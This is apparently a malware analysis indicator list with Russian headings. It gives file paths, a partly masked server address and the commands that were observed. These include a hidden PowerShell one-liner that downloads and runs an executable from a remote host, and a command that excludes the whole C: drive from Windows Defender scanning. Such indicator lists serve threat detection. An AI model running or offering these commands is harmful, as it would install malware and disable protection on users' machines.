Техническая информация
- http://mo####aupdater.com/updates/fuck1.exe как %appdata%\fuck1.exe
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\fuck1.exe
- %ALLUSERSPROFILE%\pizza.exe
- '45.##.136.244':5200
- http://mo####aupdater.com/updates/fuck1.exe
- DNS ASK mo####aupdater.com
- '%APPDATA%\fuck1.exe'
- '%ALLUSERSPROFILE%\pizza.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mo####aupdater.com/updates/fuck1.exe','%APPDATA%\fuck1.exe');Start-Pro...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\